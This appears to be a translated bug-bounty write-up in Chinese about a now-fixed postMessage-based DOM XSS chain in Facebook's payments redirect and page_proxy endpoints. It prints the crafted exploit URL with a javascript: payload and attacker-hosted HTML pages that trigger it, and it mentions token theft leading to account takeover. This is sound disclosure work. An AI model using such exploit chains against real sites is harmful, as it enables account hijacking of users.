温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

如何使用postMessage利用Facebook中基于DOM的XSS漏洞

发布时间:2021-12-23 09:56:50 来源:亿速云 阅读:338 作者:柒染 栏目:网络管理

如何使用postMessage利用Facebook中基于DOM的XSS漏洞,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

概述

我们发现的第一个漏洞将允许一名恶意攻击者从facebook.com域名并通过postMessage来发送跨域消息。存在漏洞的终端节点将接收请求参数中用户可控制的内容,并使用postMessage中的发送消息来构建一个数据对象,该对象将与postMessage一起发送到已打开的窗口。接下来,我们所发现的第二个漏洞跟第一个漏洞有关,攻击者可以利用这个漏洞来根据Eventlistener接收到的表单提交数据来构造一个不安全的脚本。

从facebook.com源通过postMessage发送消息

存在漏洞的节点为https://www.facebook.com/payments/redirect.php,这个节点的响应信息可以由各种参数来控制。我们发现的其中一个有意思的参数为“type”,这个参数如果从平时的“i”改成了“rp”的话,它将会它将使用postMessage与打开该页面的窗口通信(如果是“i”,那么它将使用window.parent.paymentsFlows.processIFrame方法)。

如何使用postMessage利用Facebook中基于DOM的XSS漏洞

需要注意的是,目标源需要设置为our.intern.facebook.com。现在,我们知道postMessage方法仅会提供给Facebook的员工使用,因为our.intern.facebook.com这个域名只有他们才拥有完整的访问权,如果不是Facebook的员工,则会被重定向至www.facebook.com。

在这里,我试图通过访问另一个域中的同一个节点alpha.facebook.com来绕过这种限制。如果访问的是our.alpha.facebook.com/payments/redirect.php,它将会返回到our.alpha.facebook.com,因为postMessage中的targetOrigin设置的就是这个地址。跟our.intern不同的是,our.alpha不会重定向至www.。这里要注意,our.alpha.facebook.com域名包含的内容跟www.facebook.com其实是一样的。这样,我们的消息就可以传递到打开的窗口了,因为targetOrigin条件已经满足,并且会将消息发送到our.alpha.facebook.com。

现在,我们已经知道了我们要找的是包含了EventListeners的页面,而它只接收消息源为accept facebook.com的消息。

XSS漏洞的发现和利用

Facebook Canvas应用程序托管在apps.facebook.com上,如果你访问了这个域名所托管的应用程序,你将会发现Facebook会加载一个iframe中的URL,并向这个URL地址发送一个包含了类似“signed_request”参数的POST新消息。

通过跟踪请求源,我发现这个页面同样加载了iframe中的https://www.facebook.com/platform/page_proxy/?version=X,然后用postMessage向其发送消息。

page_proxy这个页面中包含下列代码:

如何使用postMessage利用Facebook中基于DOM的XSS漏洞

上述这段代码主要完成了两件事情。首先,它会利用postMessage将带有frameName的消息发送到任何源。其次,它将设置一个EventListener并等待接收消息。如果收到了一条满足所有条件的消息,它将在根据消息中的数据设置其属性之后提交一个form表单。

表单构造方法submitForm()有趣的地方就在于,这个表单中的action属性会被直接设置为“a.data.params.appTabUrl”,这个地址是通过消息来接收的。URL中的“appTabUrl”字符串中的URL没有检查是否以http/https开头,因此我们就可以使用JavaScript来实现利用XSS漏洞了。

接下来,我们需要再page_proxy脚本中构造一个包含了满足所有条件的Payload对象,具体如下所示:

https://our.alpha.facebook.com/payments/redirect.php?type=rp&name=_self&ampparams[appTabUrl]=javascript:alert(1);&ampparams[signedRequest]=SIGNED_X&platformAppControllerGetFrameParamsResponse=1
OBJ: {“type”:”rp”,”name”:”_self”,”params”:{“appTabUrl”:”javascript:alert(1);”,”signedRequest”:”SIGNED_X”},”platformAppControllerGetFrameParamsResponse”:”1″}

漏洞利用

目标用户需要访问攻击者托管的恶意网站,该网站页面中需要包含下列代码:

<html>

<button class="button" onClick="window.open('https://attacker/page2.html', '_blank');document.location.href = 'https://our.alpha.facebook.com/platform/page_proxy/?version=X#_self';">

<span class="icon">Start Attack</span>

</button>

</html>

在这里,我们不打算直接重定向到page_proxy节点,因为我们需要设置一个延时来确保https://www.facebook.com/platform/page_proxy/的成功加载。

page2.html:

<html>

<script>

setTimeout(function(){ window.location.href = 'https://our.alpha.facebook.com/payments/redirect.php?type=rp&merchant_group=86&name=_self&ampparams[appTabUrl]=javascript:alert(1);&ampparams[signedRequest]=SIGNED_X&platformAppControllerGetFrameParamsResponse=1';} ,3000);

</script>

</html>

这里我设置了一个三秒的延迟,然后重定向到存在漏洞的页面中,并执行alert(1),而我设置的PoC将会窃取用户的访问令牌,这个令牌将直接允许我们接管目标Facebook账号。

漏洞修复

Faceboos目前已成功修复了该漏洞,他们直接将支付重定向(/payments/redirect.php)中的postMessage组件移除了,并在appTabUrl中添加了针对http/https的检测。

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI